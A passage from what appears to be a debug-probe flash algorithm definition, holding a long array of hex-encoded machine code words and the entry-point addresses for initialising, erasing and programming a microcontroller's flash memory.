0xe0010492, 0x04d22201, 0x2e0061a2, 0x6c22d010, 0x431a2380, 0x64222301, 0x55132279, 0x66024a20,
0x66424a20, 0x74202001, 0xd0072d00, 0xe0067467, 0x69a22301, 0x431a05db, 0xe7ef61a2, 0x22067461,
0x75207562, 0x46688260, 0x2e007301, 0x2d02d008, 0x2d03d002, 0xe007d002, 0xe0122041, 0xe0102081,
0xd00b2d02, 0xd00b2d03, 0x20087341, 0x73c84669, 0xf0009803, 0x9800feab, 0xbdf0b037, 0xe0002042,
0x46692082, 0xe7f07348, 0x00004e8d, 0x00001bac, 0x00000406, 0x24040405, 0x00200400, 0x00040400,
0x04000471, 0x00002003, 0x460db5f7, 0x2103b088, 0x73e94628, 0x30402308, 0x23587143, 0x2401642b,
0x2a007329, 0x2159d001, 0x71c46429, 0x8781210f, 0x462e87c4, 0x36ff2001, 0x36810240, 0x02406430,
0x65306470, 0x30404630, 0x72449007, 0x98084629, 0xfdcaf7ff, 0xd1392800, 0x2700485d, 0x485d9000,
0x23019703, 0x97029001, 0x4619466a, 0xf0009808, 0x9702fe93, 0x4f569703, 0x37804857, 0x23019001,
0x2100466a, 0x98089700, 0xfe86f000, 0x02c02013, 0x23029006, 0x4951aa06, 0xf0009808, 0x2800fc77,
0x2308d114, 0x2110aa04, 0xf0009808, 0x2800fc5b, 0x9805d10c, 0xb280494a, 0x98049005, 0xd1044288,
0x98052159, 0x42880209, 0x4846d002, 0xbdf0b00b, 0xaa042308, 0x98082127, 0xfc44f000, 0xd1f52800,
0x04009804, 0x90040e00, 0x28093817, 0x9904d8ed, 0x40882001, 0x200f6528, 0x90060300, 0xaa062302,
0x98082100, 0xfc42f000, 0xd1df2800, 0x4930462c, 0x31803480, 0x49346021, 0x49346061, 0x493460a1,
0x4b354a34, 0x34104f35, 0x4f29c48e, 0x378035ff, 0x4f336027, 0x4f2d6067, 0x341060a7, 0x4f31c40e,
0x602260a7, 0x4f306061, 0x4f2e60e7, 0x4f2f6127, 0xc58e3511, 0x34144f1e, 0x602f3f20, 0x606f4f2c,
0xc48e4f2c, 0x4f27c40e, 0x602260a7, 0x4f266061, 0x4f2460e7, 0x4c166127, 0x3c203d20, 0x4c26602c,
0x4c26606c, 0x462f60ac, 0x37304c22, 0xc70ec71e, 0x656c4c1c, 0x652964ea, 0x65ac4c1b, 0x37144c19,
0xc70e65ec, 0x66e9491e, 0x72312102, 0x72722203, 0x22017131, 0x74317172, 0x74712109, 0x73312104,
0x73732305, 0x210b7531, 0x99077571, 0xe77d730a, 0x8b188720, 0xa3028f10, 0xa7048f10, 0x00000555,
0x52005100, 0x00004e8d, 0xb3068f10, 0x0000a704, 0x87008700, 0x87aa8700, 0x87058700, 0x87708700,
0xb70b8f10, 0x87558700, 0x87028700, 0x87a08700, 0xa3808f10, 0x87808700, 0x87008f10, 0x00008730,
0x87108700, 0x460cb5f7, 0xb0a64979, 0x22204617, 0xa81d4479, 0xf874f7fd, 0x02016838, 0x29070f09,
0x2100d008, 0x91000300, 0xd0050f00, 0x73202003, 0xe0142050, 0xe7f52101, 0xf000a801, 0x4605fbab,
0xf0002000, 0x2d00fd63, 0xaa01d106, 0x98264621, 0xfc62f000, 0xd1140006, 0x73202000, 0x46252010,
0x35402108, 0x71696420, 0x98264621, 0xfcacf7ff, 0xd1f00006, 0x03006838, 0xd0030f01, 0x28030f00,
0xe0b1d003, 0xaa1d2301, 0x2301e001, 0x2101aa21, 0xf0009826, 0x2008fd71, 0x22007168, 0x9826a904,
0xfb9cf000, 0xd12b0006, 0xaa02ab03, 0x4620a904, 0xfdc6f000, 0x98004625, 0x35802206, 0xd0202800,
0x6628484c, 0x6668484c, 0x66a8484c, 0x61a0200c, 0x74202001, 0x75207562, 0x63284849, 0x61284849,
0x03086839, 0x46200f03, 0x30c130ff, 0x38c09001, 0xd00b2b03, 0x0f0b0409, 0xd0072b03, 0xd0200f09,
0x2050e072, 0x20036420, 0xe7e57320, 0x6229493e, 0x6029493e, 0x6069493e, 0x6429493e, 0x39dc493b,
0x493a6529, 0x60013921, 0x0149213b, 0x49376301, 0x610139eb, 0x61414938, 0x03006838, 0xd0360f00,
0x2101e04f, 0x06096d27, 0xd302428f, 0x218e2220, 0x2218e001, 0x9b0221c2, 0xb2db0412, 0x43134c2f,
0x652b4323, 0x43119b03, 0x4313b2db, 0x60034323, 0x43194b2b, 0x21476101, 0x614101c9, 0x29009900,
0x21cbd00d, 0x42a7039c, 0x21ccd300, 0x43194311, 0x49246029, 0x21236069, 0x63010149, 0x4922e024,
0x491b6029, 0x9a016069, 0x73912101, 0x2000e7f3, 0x70084669, 0x208270ca, 0x46177048, 0xf0009800,
0x2001fca5, 0x21027420, 0x21e77461, 0x756761a1, 0x82607520, 0x66284807, 0x38814806, 0x48076668,
0x990166a8, 0x73082002, 0xb0294630, 0x0000bdf0, 0x000016ac, 0x04000481, 0x04010400, 0x00002001,
0x00000406, 0x24040405, 0xa7040705, 0x8b2007fd, 0xa704b306, 0x00000706, 0x0000a304, 0x08000400,
0x0b000400, 0x2704330c, 0x8b2004fd, 0xb09cb5f7, 0x460c981e, 0x02286805, 0x28050f00, 0x2600d011,
0x223049cb, 0xa80d4479, 0xff5af7fc, 0x0f000428, 0x0328900a, 0x980a0f05, 0xd0042800, 0xd1132803,
0x2601e001, 0x2d00e7ec, 0x2d03d010, 0x2800d10c, 0x2003d00a, 0x20107320, 0x981e6420, 0x02006800,
0x28040f00, 0xe019d018, 0xe16e2704, 0xf0004668, 0x4607fa81, 0xf0002000, 0x2f00fc39, 0x466ad106,
0x981c4621, 0xfb38f000, 0xd1ee0007, 0x73202000, 0x64202010, 0xe0022003, 0x64202050, 0x90092006,
0x4328980a, 0x2601d100, 0x990a4620, 0x29033040, 0x2101d008, 0x46217141, 0xf7ff981c, 0x0007fb75,
0xe001d1d3, 0xe7f52108, 0x2d002000, 0x2e00d004, 0x2001d001, 0x2002e000, 0xa90d0100, 0x23011842,
0x981c4619, 0xfc38f000, 0x46692000, 0x75089002, 0x71082003, 0x90032001, 0xa80b9004, 0xa9019008,
0xf7fe981c, 0x0007fbdb, 0xa808d1af, 0x28c27b00, 0x2101d1ab, 0x2d000409, 0xd01da808, 0x460a7c40,
0x40823830, 0x46206522, 0x30ff2201, 0x30810312, 0x11126442, 0x65016402, 0x73202003, 0x64202010,
0x40462001, 0x46294620, 0x30c130ff, 0x35804625, 0x29009019, 0xe045d002, 0xe7e07b80, 0x2803980a,
0x2101d140, 0x20027421, 0x82617460, 0x75622206, 0x23007521, 0x22074669, 0x70ca700b, 0xd0172e00,
0x466a2182, 0x61a07051, 0x66284872, 0x38724871, 0x48716668, 0x981e66a8, 0x06007800, 0x28030f00,
0x9919d002, 0xe01a728b, 0x20019919, 0xe0167288, 0x466b2181, 0x61a07059, 0x48684b66, 0x6668662b,
0x66a84865, 0x46202101, 0x30207721, 0x70017042, 0x63214860, 0x672b3872, 0x485f6768, 0x980067a8,
0xfb84f000, 0x6328485e, 0x6128485e, 0x990a1de0, 0x290030f9, 0x2e00d003, 0x2321d016, 0x2101e015,
0x49597321, 0x49596029, 0x49576069, 0x61011d89, 0x61414957, 0x31154954, 0x49536529, 0x600131d0,
0x01492123, 0xe0906301, 0x2e002301, 0x2122d001, 0x2102e000, 0x2e00468c, 0x212cd001, 0x210ce000,
0x2e00911a, 0x2129d001, 0x2109e000, 0x2e00910a, 0x2128d001, 0x2108e000, 0x2e009100, 0x4a40d007,
0x3a180299, 0x069a1889, 0x4a424311, 0x22fbe006, 0x00920299, 0x069a1889, 0x4a3f4311, 0x60294311,
0x22194661, 0x01520289, 0x991a188a, 0x06894696, 0x4a3a4311, 0x60694311, 0x22c1990a, 0x00920289,
0x920a188a, 0x60aa0299, 0x069b4a35, 0x469c188a, 0x4b34431a, 0x642b4313, 0x1e5b4b31, 0x466318ca,
0x4b31431a, 0x622b4313, 0x021b2303, 0x466318ca, 0x2303431a, 0x4313061b, 0x62ab626b, 0x9a0a4b28,
0x62ea330c, 0x466318ca, 0x4b28431a, 0x61034313, 0x46729b00, 0x431a069b, 0x049b23c1, 0x61434313,
0x331b4b1f, 0x466318ca, 0x4b21431a, 0x46724313, 0x656a652b, 0x009222f7, 0x4663188d, 0x4b1d431d,
0x431d4672, 0x60426005, 0x0152221b, 0x46631889, 0x43194a19, 0x63014311, 0xd0032e00, 0x21406c20,
0x64204308, 0x20029919, 0x46387308, 0xbdf0b01f, 0x00001448, 0x04000472, 0x20010400, 0x04020400,
0x00000406, 0x24040405, 0x0820040c, 0x24043008, 0x00002004, 0x03110000, 0x03130000, 0x03060000,
0x00000306, 0x03f90000, 0x03fa0000, 0x03ed0000, 0x03de0000, 0x03230000, 0x039f0000, 0x4607b5f0,
0xb0a92000, 0x4616460d, 0x49262404, 0x90269025, 0x22309027, 0x90284479, 0xf7fca819, 0x6830fd91,
0x0f000300, 0x2104d13b, 0x55412045, 0x491e4628, 0x60013080, 0x6041491d, 0x46384629, 0xf9e4f7ff,
0xd12c0004, 0x06007830, 0x28010f00, 0x1de8d10e, 0x30f94917, 0x67416701, 0x67811409, 0x461a2300,
0x46384629, 0xf840f7ff, 0xd1180004, 0xa9196830, 0x0f000300, 0x18420100, 0x46192301, 0xf0004638,
0x2200fa9b, 0x46384669, 0xf8c8f000, 0xd1060004, 0x466a4633, 0x46384629, 0xfc42f000, 0x46204604,
0xbdf0b029, 0x00001088, 0x08180403, 0x00012404, 0x06ff06ff, 0x2704b5f7, 0x460c4615, 0xd05a2900,
0xd0582d00, 0x462001f9, 0xfe50f7fc, 0x46262101, 0x71b13640, 0x65200608, 0x60204828, 0x60604828,
0x73602003, 0x20ff73a0, 0x550130c9, 0x01006828, 0xd0080f00, 0x03006868, 0x28010f00, 0x6c20d103,
0x43080209, 0x68286420, 0x0f000200, 0xf7fe0003, 0x060af82f, 0x17110c06, 0x231d1d17, 0x462a3023,
0x98004621, 0xff6af7ff, 0x2201e001, 0x0007e003, 0xe01ed018, 0x46212200, 0xf7ff9800, 0xe7f6fb75,
0x4621462a, 0xf7ff9800, 0xe7f0fd91, 0x4621462a, 0xf7ff9800, 0xe7eafc77, 0x4621462a, 0xf7ff9800,
0xe7e4f9f9, 0xf0004620, 0x7828f9f7, 0x0f000700, 0x200171b0, 0x46387130, 0x0000bdfe, 0x42464346,
0x56010400, 0xb089b530, 0x466d2403, 0x2501702c, 0x24000049, 0x91019503, 0x466d9402, 0x4669742c,
0x92079308, 0xf9baf7fe, 0xbd30b009, 0xb089b530, 0x466d2402, 0x2401702c, 0x91010049, 0x94039402,
0x74292100, 0x93064669, 0xf7fe9205, 0xb009f9a7, 0x0000bd30, 0x6a894902, 0x20006001, 0x00004770,
0x400f8000, 0x4607b5f0, 0xb0892004, 0x4614461d, 0x2a00460e, 0x2124d00f, 0xf7fc4668, 0x2003fdb7,
0x70084669, 0x90022001, 0x90039508, 0x94079601, 0xf7fe4638, 0xb009f983, 0x0000bdf0, 0x4e3ab5f7,
0x000db098, 0x2308d008, 0x2100466a, 0xf7ff9818, 0x0004ffd9, 0xe001d164, 0xe0612404, 0x98004933,
0xd0014288, 0xe05b4634, 0x79004668, 0x46686028, 0x1c407980, 0xd900280a, 0x9016200a, 0x2108981a,
0xd0002800, 0x98160209, 0x00c3aa02, 0xf7ff9818, 0x0004ffb9, 0x2164d144, 0xf7fc4628, 0x2600fd77,
0x00f0e03b, 0x5c11aa02, 0x79d81883, 0x180a0200, 0x020020ff, 0xd0024282, 0x4282481d, 0x2100d12c,
0x020f2002, 0x79091819, 0x1e404339, 0x78d8d5f9, 0x981a0087, 0xd0002800, 0x20ff0209, 0x42820200,
0x2f50d10c, 0x2750d900, 0x463b462a, 0x98183208, 0xff88f7ff, 0xd1130004, 0xe00d606f, 0x4282480c,
0x462ad10a, 0x325c463b, 0xf7ff9818, 0x0004ff7b, 0x2101d106, 0x55412058, 0x98161c76, 0xd3c04286,
0xb01b4620, 0x0000bdf0, 0x00004e8b, 0x50444653, 0x0000ff84, 0xb089b5ff, 0x4616461d, 0x9809460c,
0xf8e1f000, 0xd1142800, 0x70084669, 0x200e2701, 0x90029703, 0x4622740e, 0x326132ff, 0x4639463b,
0x98099501, 0xf938f000, 0x97024669, 0xf7fe9809, 0xb00df8e5, 0x0000bdf0, 0x2504b5f7, 0x4617b092,
0x2a00460c, 0x7878d004, 0x42887839, 0x2500d101, 0x4620e087, 0x21083040, 0x71419011, 0x25037878,
0x28422601, 0x2841d001, 0x2502d103, 0x21049811, 0x78787141, 0xd0012882, 0xd1002842, 0x20002621,
0x90014669, 0x70087408, 0x90022001, 0xa8092120, 0xfcdcf7fc, 0x200278f9, 0x29060242, 0x2907d00b,
0x2908d012, 0x2001d001, 0x0229e02b, 0x43131d8b, 0x930931ff, 0x0229e005, 0x3366460b, 0x31994313,
0x43119309, 0xe01c910d, 0x460f0229, 0x376602b2, 0x4317062b, 0x431f06b5, 0x432f46ac, 0x31992599,
0x4311042d, 0x4319432f, 0x22334665, 0x04524329, 0x97094311, 0x2e21910d, 0x6c21d103, 0x43112240,
0x90036421, 0x20019911, 0x06017188, 0x49166521, 0x49166021, 0x21036061, 0x73a17361, 0x31c921ff,
0x200a5508, 0x46216760, 0xf7fe9812, 0x0005ffdd, 0xaa09d117, 0x9b032101, 0xf0009812, 0x4669f8ad,
0xf7fe9812, 0x4605f85b, 0x217d4809, 0x00c94448, 0xf7fc6800, 0xe001fc7d, 0x1e40bf00, 0x28009011,
0x4628d1fa, 0xbdf0b015, 0x42464346, 0x56010400, 0x00000058, 0x2004b5ff, 0x469cb083, 0x29004696,
0x460dd01f, 0x35c135ff, 0x460c7b28, 0x28023480, 0x4620d10b, 0xc8893010, 0x69e6466a, 0x4620c289,
0xc88d3020, 0xc48d3410, 0x46633c20, 0x98034672, 0xfad2f7fe, 0x29027b29, 0x466dd103, 0x3410cd0e,
0xb007c44e, 0xb5ffbdf0, 0xb0832004, 0x2900460d, 0x462ed029, 0x36c136ff, 0x28007b70, 0x9b06d006,
0x98039a05, 0xfdf0f7fe, 0xd11c2800, 0x462c7b30, 0x28023480, 0x4620d10a, 0xc8873030, 0xc307466b,
0x30404620, 0x3430c80f, 0x3c40c40f, 0x9b064629, 0x98039a05, 0xfb80f7fe, 0x29027b31, 0x466dd103,
0x3430cd0e, 0xb007c48e, 0x0000bdf0, 0x62884901, 0x47702000, 0x400f8000, 0x28002104, 0x7b01d00f,
0xd10b2903, 0x30606c01, 0x29000649, 0x2113da01, 0x7e41e003, 0xd1012900, 0x76012126, 0x46082100,
0xb5f84770, 0x460f4606, 0x2001e002, 0xf94ef000, 0x463c2000, 0x1e7643c0, 0x46274144, 0x43f943f0,
0xd1f24308, 0x6801bdf8, 0x43112201, 0x68016001, 0xd1fc07c9, 0x00004770, 0x460eb5f8, 0x461f2104,
0x91004615, 0xfba4f7fe, 0xd0230004, 0xd0212d00, 0x19f22100, 0x23104149, 0x1a9a2000, 0xd3194188,
0xf0004620, 0x4a0cf825, 0x200261a2, 0x19f161e0, 0x008b00b0, 0x19090081, 0x31ff31ff, 0xe0023102,
0xc140cd40, 0x42981c40, 0x61a2d3fa, 0x61e02001, 0x90002000, 0xbdf89800, 0x5af05af0, 0xf7feb510,
0x2800fb77, 0x3080d003, 0x07896e01, 0xbd10d5fc, 0x6e013080, 0xd0fc07c9, 0x07896e01, 0x4770d5fc,
0x4805b510, 0x05806940, 0x48040f81, 0x44481c49, 0xf7fc6800, 0xbd10fb8d, 0x400fc000, 0x00000058,
0x4805b510, 0x05806940, 0x48040f81, 0x44481c49, 0xf7fc6800, 0xbd10fb7d, 0x400fc000, 0x00000058,
0x4608b5ff, 0x305cb082, 0x460b9000, 0x330868c8, 0x28002701, 0x463ada03, 0x40821ec0, 0x1c40e001,
0x980208c2, 0x650224ff, 0x92019e02, 0x36ff6848, 0x36813401, 0xd2012840, 0xe00a6434, 0x06008d18,
0x46380f02, 0x22014090, 0x429003d2, 0x4620d100, 0x4d316430, 0x46202400, 0x18d20042, 0x2f007f17,
0x2201d00d, 0x42aa40ba, 0x4615d201, 0x42a24684, 0x2701d905, 0x42ba053f, 0x4614d201, 0x1c404686,
0xd3e92804, 0x65346475, 0x30ff9802, 0x42a530c1, 0x2201d101, 0x2200e000, 0x22017242, 0x06129801,
0xd92d4290, 0x7e083140, 0xd0082800, 0x44609800, 0x98047901, 0x98006001, 0x79014470, 0x4660e018,
0x18c00040, 0x21217f40, 0x282022dc, 0x28d8d002, 0xe002d105, 0x60019804, 0x9804e001, 0x46706002,
0x18c00040, 0x28207f40, 0x28d8d002, 0xe002d105, 0x60019805, 0x9805e001, 0x20006002, 0xbdf0b006,
0x00404660, 0x7f4118c0, 0x60019804, 0x00404670, 0x7f4118c0, 0x0000e7ec, 0x00ffffff, 0x20ff4a0e,
0x68526851, 0x0f890609, 0x0f920692, 0xd0072900, 0xd00f2901, 0xd0072902, 0xd1002903, 0x47702002,
0xd0032a00, 0xd0032a01, 0x47702008, 0x47702001, 0x47702010, 0x47702020, 0x400f8000, 0x47704800,
0x01312d00, 0x2003b510, 0x21030240, 0xfbbaf7fc, 0x2000bd10, 0x20004770, 0x00004770, 0xb5104903,
0x00c04449, 0xf7fc6809, 0xbd10fab3, 0x0000004c, 0xb5104905, 0x68094449, 0xfc92f7fd, 0x08c0074a,
0x08c94310, 0x0000bd10, 0x0000004c, 0x4602b570, 0xf832f000, 0x4909460d, 0x44494604, 0x68094610,
0xfc7ef7fd, 0x08c3074a, 0x08ca4313, 0x416a191c, 0xf822f000, 0x41911b00, 0xbd70d3fa, 0x0000004c,
0x4809b510, 0x69c06941, 0x0f890589, 0x48070684, 0x44480ea4, 0x1c496800, 0xf7fc1c64, 0x4621fa79,
0xfa76f7fc, 0x0000bd10, 0x400fc000, 0x00000058, 0xf7ffb510, 0xbd10fed5, 0x4803b508, 0x6a406a01,
0x43c09000, 0xbd0843c9, 0x400840c0, 0x4813b510, 0x68012304, 0x03122203, 0x43114391, 0x48106001,
0x60012100, 0x1e4a480f, 0x61816102, 0x61c42401, 0x43196981, 0x69816181, 0x61814321, 0x60c46002,
0xf7ff6084, 0x00c0ffbd, 0xf7fc4907, 0x4907fa41, 0x44492800, 0xd1006008, 0xbd10600c, 0x400fc06c,
0x40084000, 0x40084100, 0x000f4240, 0x0000004c, 0x68014802, 0x43112202, 0x47706001, 0x40084000,
0xb08bb5ff, 0x90032004, 0x460f980d, 0x90013008, 0x305c980d, 0x20009008, 0x980e9002, 0x02006800,
0x28010f00, 0x9801d105, 0x03006800, 0x90020fc0, 0x2000d07e, 0x990e7338, 0x78094606, 0x070aab0a,
0x21460f12, 0x900055ca, 0x90042018, 0x90052000, 0x4638aa09, 0xf7ff990d, 0x2101fe83, 0x06096d38,
0xd9014288, 0x90042020, 0x8800980e, 0x0f000400, 0x4639d15e, 0x9a0d9b0e, 0xf000980b, 0x9003f9cb,
0xd1f52800, 0x68009801, 0xd5080281, 0x90052002, 0x7a009801, 0x0f4e0601, 0x0ec006c0, 0x0240e007,
0x9801d506, 0x02016880, 0x02c00f4e, 0x90000ec0, 0x9a04980d, 0x1dfc3040, 0x34f949a2, 0x2a209007,
0x48a1d002, 0xe0116120, 0x4ba07e00, 0xd03c2800, 0x4a9f9808, 0x05c56800, 0x489ed501, 0x0600e003,
0x489ad533, 0x61623022, 0xe0006120, 0x20016161, 0x463d7338, 0x35804898, 0x48986328, 0x98096128,
0xb2c14a97, 0x04009804, 0x43114301, 0x65299006, 0xb2c9990a, 0x43114301, 0x01402023, 0x63206021,
0x6800980e, 0x0f010100, 0x990ed011, 0xe0006849, 0x060ae0e3, 0xd00a0e12, 0x9902b2c8, 0x90002600,
0xd0212900, 0x90000040, 0x6123e01e, 0x9902e7ce, 0xd0192900, 0xd1170f00, 0x28209804, 0x487bd104,
0x60281c40, 0x6068487f, 0x980b4639, 0xfcbcf7fe, 0x28009003, 0x466ad185, 0x980b4639, 0xf9e8f000,
0x28009003, 0x2600d1f6, 0x28189804, 0xd0039802, 0xd01c2800, 0xe00220ee, 0xd0082800, 0x6c3920ed,
0x43112240, 0x99066439, 0x486f4301, 0x9801e033, 0x02816800, 0x9801d503, 0x04008900, 0x0240e003,
0x9801d503, 0x0e006880, 0x2003e01f, 0x9807e010, 0x28007e00, 0x9808d010, 0x06816800, 0x20ecd502,
0xe0032102, 0xd52706c0, 0x2100206c, 0xe00c9105, 0x460e2100, 0xe0089100, 0x68009801, 0xd5010281,
0xe00220ec, 0xd5170240, 0x9906206c, 0x98054301, 0x43010600, 0x463a4852, 0x60294301, 0x32ff990e,
0x32c17809, 0x20000609, 0x92050f0b, 0xd0052b00, 0x29010f09, 0xe06dd006, 0xe7d92013, 0x19809800,
0xe0499000, 0x6849990d, 0xd3f72940, 0x6b899901, 0xd5f3058a, 0x0f090309, 0x42112205, 0x20a5d001,
0x0789e00b, 0x4639d509, 0x9a0d9b0e, 0xf000980b, 0x9003f895, 0xd14d2800, 0x99012001, 0x8f09220a,
0x0e890409, 0xd0074211, 0x67214938, 0x99046761, 0xd1092920, 0xe0064936, 0x42112211, 0x4935d03a,
0x67616721, 0x67a14934, 0x9a052101, 0x73512e00, 0x9902d011, 0xd0332900, 0xd02e2e01, 0x02892127,
0x99004308, 0x0a090609, 0x492c4308, 0x60684308, 0x60a8482b, 0x9800e017, 0xd00f2800, 0x49299a02,
0xd0052a00, 0x1840b2c0, 0x43084927, 0xe00a6068, 0x1840b2c0, 0x43084925, 0xe00b6068, 0x60684824,
0x28009802, 0x9905d006, 0x73882001, 0x21406c38, 0x64384308, 0xb00f9803, 0x2126bdf0, 0xe7ce0900,
0xd00c2e01, 0x02892107, 0x99004308, 0x0a090609, 0x49184308, 0x60684308, 0x60a84817, 0x2106e7ea,
0xe7f00900, 0x00002004, 0x08180402, 0x08200412, 0x00002204, 0x0a20043e, 0x00000406, 0x24040405,
0x08000400, 0x00012404, 0x8a000400, 0x06ff06ff, 0x000006ff, 0x06000600, 0x32101e00, 0xb2000200,
0x7c01a604, 0x00040200, 0xa604b000, 0x26043000, 0x00002404, 0x32000200, 0x7c012604, 0xb08eb570,
0x2100460c, 0x9100910c, 0x910d910b, 0x9102466a, 0x75114606, 0x71102003, 0x95032501, 0x95094813,
0x900a9208, 0x9504462b, 0x4629aa0a, 0xf7ff4630, 0xa901fc63, 0xf7fd4630, 0x2800fc11, 0x9900d113,
0x401122f7, 0x040a4b0a, 0x910018d3, 0x742522ff, 0x51133261, 0x220e7525, 0x61a17562, 0x74612104,
0x34c134ff, 0xb00e73e5, 0x0000bd70, 0x24010485, 0x04000481, 0xb08fb5ff, 0x460c2000, 0x900b900a,
0x900d900c, 0x25016811, 0x2905461e, 0x6851d202, 0xd3152940, 0x6c117425, 0x0f490249, 0xf7fd000b,
0x0d07fa07, 0x050b0905, 0x000d0705, 0xe00b2702, 0xe0092704, 0xe0072701, 0xe0052703, 0xe06d7420,
0x05098831, 0xd0690f0f, 0x90002000, 0x90024669, 0x20037508, 0x95097108, 0x95049503, 0x2f019108,
0x2f02d007, 0x2f03d003, 0x2f04d02a, 0x482dd104, 0x482ce001, 0x900a3830, 0xaa0a2301, 0x980f4619,
0xfbfaf7ff, 0x980fa901, 0xfba8f7fd, 0xd1462800, 0x01006830, 0xd0050f00, 0x040088b0, 0xd0010e01,
0x90000e00, 0x74202000, 0x30804620, 0xd00a2f01, 0x2f022202, 0x2f03d010, 0x2f04d026, 0xe01bd12e,
0x300a4818, 0x9900e7d7, 0xd427064a, 0x66024a16, 0x400120c3, 0xe01e2040, 0x078b9900, 0x4b13d41e,
0x66034311, 0x90000208, 0x75257425, 0x75602006, 0x61a09800, 0xe0117465, 0x078b9900, 0x4b0ad40e,
0x43113330, 0xe0076603, 0x060a9900, 0x4a07d406, 0x6602323d, 0x43012080, 0xe7e59100, 0xb0132000,
0x0000bdf0, 0x24010435, 0x20010401, 0x20020401, 0x2001b5f7, 0xb0980240, 0x90012700, 0x74074668,
0x460d2401, 0x94039702, 0xd0722900, 0x4478485b, 0xa90dc84d, 0x2003c14d, 0x7010466a, 0x9007a809,
0x90082010, 0x3280462a, 0x9b032101, 0xf7ff9818, 0x4669fb83, 0x98189402, 0xfb30f7fd, 0xd1582800,
0x1c409809, 0x980ad108, 0xd1051c40, 0x1c40980b, 0x980cd102, 0xd0071c40, 0xa9092210, 0xf7fba80d,
0x2800fefa, 0xe034d145, 0x461a2300, 0x98184629, 0xfaf9f7ff, 0xd17b2800, 0x90022009, 0x46692002,
0xa80d7008, 0x2610462a, 0x32ff9005, 0x32119606, 0x9b032101, 0xf7ff9818, 0x4669fb4f, 0x98189402,
0xfafcf7fd, 0xd1632800, 0x461a2300, 0x98184629, 0xfda2f7fd, 0xd15b2800, 0x20039002, 0x70084669,
0x9007a809, 0x98189608, 0xfae8f7fd, 0xd14f2800, 0x2032e7c2, 0x20009016, 0x6c289015, 0x43082140,
0x20466428, 0x26025d41, 0x98182201, 0xfa64f7fd, 0xe03de038, 0x94112400, 0x94139412, 0x21019414,
0x06096d28, 0xd9014288, 0xe000481d, 0x9011481d, 0xb2f0491d, 0x491d1840, 0x43082301, 0xaa119012,
0x98182100, 0xfb08f7ff, 0x46692003, 0x70089402, 0x9007a809, 0x90082010, 0xf7fd9818, 0x0004faaf,
0x2f00d006, 0x981ad014, 0x60062f00, 0xe010d010, 0xa9092210, 0xf7fba80d, 0x2800fe7e, 0x1c76d00c,
0xd1f02f00, 0x99169815, 0x90151c40, 0xd3c14288, 0xb01b4c07, 0xbdf04620, 0xe7e42701, 0x000001fe,
0x8a2004ee, 0x8a1804ed, 0x00040200, 0xa604b000, 0x00004e8e, 0x00004770, 0x6801480d, 0x43112203,
0x480c6001, 0x61412140, 0x480b0401, 0x04816381, 0x21006381, 0x48096001, 0x04d26b01, 0x63014311,
0x68014807, 0x00490849, 0x20016001, 0x00004770, 0x400fc080, 0x400d8000, 0x400d9000, 0x400d8180,
0x402e0140, 0x08220000, 0x06180816, 0x0612041e, 0x050d060e, 0x0216040d, 0x06180000, 0x060c0416,
0x0312021e, 0x01210216, 0x0116020d, 0x402a8000, 0x33221100, 0x77665544, 0xbbaa9988, 0xffeeddcc,
0x0818045a, 0x24ff3008, 0x00000000, 0x00000000, 0x0918055a, 0x25ff3108, 0x00000000, 0x00000000,
0x0a18065a, 0x26ff3208, 0x00000000, 0x00000000, 0x2403049f, 0x00000000, 0x00000000, 0x00000000,
0x0760079f, 0x27040b20, 0x00000000, 0x00000000, 0x8760879f, 0xa7048b20, 0x00000000, 0x00000000,
0x0818045a, 0x24ff3008, 0x00000000, 0x00000000, 0x8b20075a, 0x0000a7ff, 0x00000000, 0x00000000,
0x0818045a, 0x24ff3008, 0x00000000, 0x00000000, 0x0a18065a, 0x000026ff, 0x00000000, 0x00000000,
0x0b18075a, 0x000027ff, 0x00000000, 0x00000000, 0x8a18065a, 0x0000a6ff, 0x00000000, 0x00000000,
0x8b20075a, 0x0000a7ff, 0x00000000, 0x00000000, 0x00000000, 0x40184000, 0x40188000, 0x4018c000,
0x40190000, 0x40194000, 0x40198000, 0x4019c000, 0x401a0000, 0x0014ff80, 0x00160015, 0x00180017,
0x001a0019, 0xffff001b, 0x001c0518, 0x0118000c, 0x03060302, 0x060e051a, 0x017d7840, 0x02faf080,
0x05f5e100, 0x07735940, 0x00000000, 0x00000000, 0x00000000, 0x412000d1, 0x60002000, 0x00000000,
0x00000000, 0x60001020, 0x60001000, 0x00000000, 0x00000000, 0x60000000, 0x00800000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x11b3dc40, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000
],
'pc_init' : 0x20000b01,
'pc_uninit' : 0x200015ff,
'pc_eraseAll' : 0x20000abd,
'pc_program_page' : 0x20001399,
'pc_erase_sector' : 0x20000ae1,
